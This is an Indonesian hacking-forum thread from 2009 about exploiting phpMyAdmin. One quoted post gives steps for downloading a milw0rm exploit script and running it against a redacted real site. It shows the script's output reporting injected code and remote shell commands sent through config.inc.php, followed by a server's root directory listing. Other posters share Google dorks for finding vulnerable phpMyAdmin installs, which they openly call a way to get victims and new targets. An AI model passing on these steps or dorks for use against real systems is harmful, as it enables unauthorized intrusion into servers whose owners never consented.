Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
-
shad.hckr
- Posts: 555
- Joined: Mon Sep 29, 2008 4:48 am
- Location: /home/sh4dhckr
-
Contact:
Post
by shad.hckr » Sat Jun 20, 2009 9:53 pm
agent_of_change wrote:Xshadow wrote:
berarti tidak diperbolehkan masuk phpmyadmin secara langsung
harus lewat cpanel dulu...
try and error trus bro
cari target lain
jangan terpaku 1 target
ada dork nya ga?
biar cepet dapet korban
mungkin bisa pake itu kk..
-
justkid
- Posts: 19
- Joined: Sat Jul 12, 2008 3:05 am
Post
by justkid » Sat Jun 20, 2009 9:59 pm
3. kalo kamu pake linux kamu harus install curl caranya :
Code:
sudo apt-get install curl
Harus pake Linux ya.....
isntal dulu dung
-
Xshadow
- Posts: 482
- Joined: Thu May 31, 2007 8:01 pm
- Location: http://captureflags.com
-
Contact:
Post
by Xshadow » Mon Jun 22, 2009 3:21 am
justkid wrote:3. kalo kamu pake linux kamu harus install curl caranya :
Code:
sudo apt-get install curl
Harus pake Linux ya.....
isntal dulu dung
pakai lve cd juga bisa...
atau pakai Damn small linux yang fersi qemu.... cuman butuh komputer spec yang agak advanced dikit
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare
-
KOPASSUS
- Posts: 1
- Joined: Mon Apr 20, 2009 12:19 pm
Post
by KOPASSUS » Sun Aug 09, 2009 10:11 am
wishnusakti wrote:jumpa lagi nih... jangan bosen ya... disini aku mau kasih PoC phpMyAdmin injection code, dan udah berhasil sih hehehe
. ok deh langsung aja :
1. Download exploit nya di milw0rm
Code: Select all
http://milw0rm.com/exploits/download/8921
2. setelah di download ubah permission file yang dengan cara :
3. kalo kamu pake linux kamu harus install curl caranya :
4. googling :
5. contoh nya :
Code: Select all
wishnu@stupid:~/Desktop$ ./myadmin.sh http://**********.****.**/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/myadmin.sh.25692.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
http://*********.*****.**//config/config.inc.php?c=ls+-l+/
http://***************//config/config.inc.php?p=phpinfo();
please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.com
dan hasilnya :
Code: Select all
total 112
drwxr-xr-x 2 root root 4096 Mar 11 06:47 bin
drwxr-xr-x 3 root root 4096 Apr 16 07:24 boot
lrwxrwxrwx 1 root root 11 Feb 19 20:07 cdrom -> media/cdrom
drwxr-xr-x 13 root root 13840 May 31 08:21 dev
drwxr-xr-x 96 root root 4096 Jun 11 06:44 etc
drwxr-xr-x 5 root root 4096 May 4 13:49 home
lrwxrwxrwx 1 root root 32 Feb 20 07:00 initrd.img -> boot/initrd.img-2.6.27-11-server
lrwxrwxrwx 1 root root 31 Feb 19 20:09 initrd.img.old -> boot/initrd.img-2.6.27-7-server
drwxr-xr-x 13 root root 12288 Apr 16 07:23 lib
drwx------ 2 root root 16384 Feb 19 20:07 lost+found
drwxr-xr-x 3 root root 4096 Feb 19 20:07 media
drwxr-xr-x 14 root root 4096 May 18 22:39 mnt
drwxr-xr-x 2 root root 4096 Feb 19 20:08 opt
dr-xr-xr-x 115 root root 0 May 31 08:21 proc
drwxr-xr-x 9 root root 4096 May 19 14:47 root
drwxr-xr-x 2 root root 4096 Apr 16 07:23 sbin
-rw------- 1 root root 31903 Feb 19 23:34 sql1qPPmS
drwxr-xr-x 2 root root 4096 Feb 19 20:08 srv
drwxr-xr-x 12 root root 0 May 31 08:21 sys
drwxrwxrwt 5 root root 4096 Jun 14 05:32 tmp
drwxr-xr-x 11 root root 4096 Feb 19 20:14 usr
drwxr-xr-x 15 root root 4096 Feb 19 20:26 var
lrwxrwxrwx 1 root root 29 Feb 20 07:00 vmlinuz -> boot/vmlinuz-2.6.27-11-server
lrwxrwxrwx 1 root root 28 Feb 19 20:09 vmlinuz.old -> boot/vmlinuz-2.6.27-7-server
ok dehhh sekian dulu ya
thanks to: inc0mp13te, xshadow, mywisdom, cybermutaqin dan lain lain
salam PsyChotr0n
Bro.. gw masih agak bingung di no4.
Googling,
Nah, disini bentuk URL nya seperti apa yg kita cari..?
kira-kira bisa di kasih detail lagi gak..?
sorry, gw newbie..
-
gblack
- Posts: 61
- Joined: Tue Jan 30, 2007 8:12 pm
- Location: /r00tb0x
-
Contact:
Post
by gblack » Mon Aug 10, 2009 3:43 pm
Code: Select all
inurl:"querywindow.php"
inurl:"/xampp/phpinfo.php"
inurl:"import.php"
Dork diatas mungkin ga 100% akurat.. Tp selama itu bs memberikan target baru why not...
Down doesn't mean die.
I will never die,
gbLaCk-
-
zpwnd
- Posts: 2
- Joined: Wed Oct 07, 2009 1:01 am
Post
by zpwnd » Wed Oct 07, 2009 1:12 am
Santet wrote:iya disini terdeksi av nya linux apa geto
tpi kompi saya buat kerja
dan ini bkn kompi sendiri
ada cara laen yang bwt windows gk??
please
hueuhe,,,
mank harus pake linux cuz ini koding bash
-
r-newbie
- Posts: 5
- Joined: Thu Jan 10, 2008 4:49 am
- Location: SEMARANG
-
Contact:
Post
by r-newbie » Sat Oct 17, 2009 12:57 am
udah tk coba bro..,tp hasilnya seringnya gni..
Code: Select all
[+] could not grab form token. you might want to try exploiting the vuln manually :(
musti rajin2 cari target nih
Learning Newbie
-
tey
- Posts: 68
- Joined: Tue May 01, 2007 11:30 am
- Location: heaven
Post
by tey » Thu Dec 24, 2009 12:57 pm
gblack wrote:Code: Select all
inurl:"querywindow.php"
inurl:"/xampp/phpinfo.php"
inurl:"import.php"
Dork diatas mungkin ga 100% akurat.. Tp selama itu bs memberikan target baru why not...
hehheh sip tambahin neh atu lg dork na
:kaca:
i am not detractor person..like u
be a good boy..
-
the_girl
- Posts: 16
- Joined: Sun Mar 25, 2007 4:09 am
- Location: ©urup±$em@rang™
-
Contact:
Post
by the_girl » Thu Dec 24, 2009 1:07 pm
wedew...
omz @ll...
ikut cuba nyack oms...
mohon bimbingannya...
Code: Select all
inurl:phpmyadmin/index.php
inurl:phpmyadmin/index.php joomla
xixix...mav omz masi nubei...
-
kocokprotol
- Posts: 129
- Joined: Thu Jul 23, 2009 12:07 am
-
Contact:
Post
by kocokprotol » Fri Dec 25, 2009 5:06 am
aaaaaaaaaaaaaaaaaaaaaaaaaaa gak ngerti aqo ...............
pening kepala awak ni bacanya ...